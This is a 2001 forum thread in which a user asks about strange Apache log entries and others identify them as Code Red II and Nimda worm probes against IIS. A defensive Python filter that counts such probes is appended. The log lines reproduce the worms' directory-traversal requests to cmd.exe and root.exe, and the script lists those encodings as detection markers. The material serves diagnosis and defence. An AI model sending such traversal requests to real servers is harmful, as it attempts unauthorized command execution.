access_log (from Apache) says:

tazmandevil

In my Apache "access_log" I always have some stupid entries like these:

194.230.143.50 - - [21/Sep/2001:13:20:28 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.143.50 - - [21/Sep/2001:13:20:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
194.230.143.50 - - [21/Sep/2001:13:20:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:33 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:34 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:35 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:38 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
194.230.143.50 - - [21/Sep/2001:13:20:39 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:40 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:43 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:44 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.138.40 - - [22/Sep/2001:00:53:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.138.40 - - [22/Sep/2001:00:53:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274


Is that a virus client searching for a trojan of this Code Red thing? (Good luck, I don't have a PC..... It's incredible how quick, fast and often such requests come to me!.... I don't understand how such a frequency is possible... I'm just a usual user, I have no permanent server or anything!.... Is that going around the world on every PC?... Where does it come from?)
 
That's certainly what it looks like. Code Red II copies cmd.exe into the scripts folder [a default folder that has execute privileges set] as root.exe. There are some new nasty viruses out that I haven't studied up on, but it all looks like virus activity to me. No worries, it's all anti-micro$oft :)
 
That is the W32/Nimda@MM virus. It only affects NT/W2k servers... so you should not worry. The only thing it will do is slow down the response of your server by asking for files that are not present.
Until the Windows people fix their servers you will continue to see these "file requests" in your logs.
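The two replies above identify the entries as Code Red II / Nimda probes and note that the server is answering them with 404s. A small filter that pulls exactly that out of an Apache access_log (how many probe requests each source host sent, and whether any of them got a 2xx instead of a 404/400) is given here as an added example; it is not code from the original thread or from Apache. The sample lines are constructed by copying a few entries from the post above plus one ordinary request, and the marker list is an assumption drawn from the request strings shown in the thread rather than a complete signature set.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied from the thread plus one normal request
# so the filter has something to leave alone.
SAMPLE_LOG = """\
194.230.143.50 - - [21/Sep/2001:13:20:28 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.143.50 - - [21/Sep/2001:13:20:34 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.138.40 - - [22/Sep/2001:00:53:34 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
10.0.0.7 - - [22/Sep/2001:01:02:03 +0200] "GET /index.html HTTP/1.0" 200 1234
"""

# Apache Common Log Format: host ident user [time] "method path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Substrings taken from the request strings in the thread (assumed marker list,
# matched on the raw, still percent-encoded path, case-insensitively).
PROBE_MARKERS = (
    "root.exe",   # the cmd.exe copy Code Red II leaves behind, which Nimda then asks for
    "cmd.exe",    # direct requests for the command shell
    "..%255c",    # double-encoded backslash traversal
    "..%c0%af",   # overlong UTF-8 encoding of "/"
    "..%c1%1c",   # overlong UTF-8 encoding of "\"
)


def parse_line(line):
    """Split one access_log line into its fields; None if it is not CLF."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_worm_probe(path):
    """True if the request path carries one of the probe markers."""
    p = path.lower()
    return any(marker in p for marker in PROBE_MARKERS)


def summarize(log_text):
    """Per source host: number of probe requests, and how many got a 2xx answer.

    A 2xx here is the thing worth looking at: it means the server actually
    served something for a request that should have been a 404, as in the thread.
    """
    summary = defaultdict(lambda: {"probes": 0, "served": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_worm_probe(rec["path"]):
            continue
        entry = summary[rec["host"]]
        entry["probes"] += 1
        if 200 <= rec["status"] < 300:
            entry["served"] += 1
    return dict(summary)


if __name__ == "__main__":
    for host, counts in summarize(SAMPLE_LOG).items():
        print(f"{host}: {counts['probes']} probe(s), {counts['served']} served")
```

On a real server the script would be run over the whole access_log instead of SAMPLE_LOG; for the lines in the thread every probe comes back 404 or 400 and "served" stays at zero, which is the case the second reply describes.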
 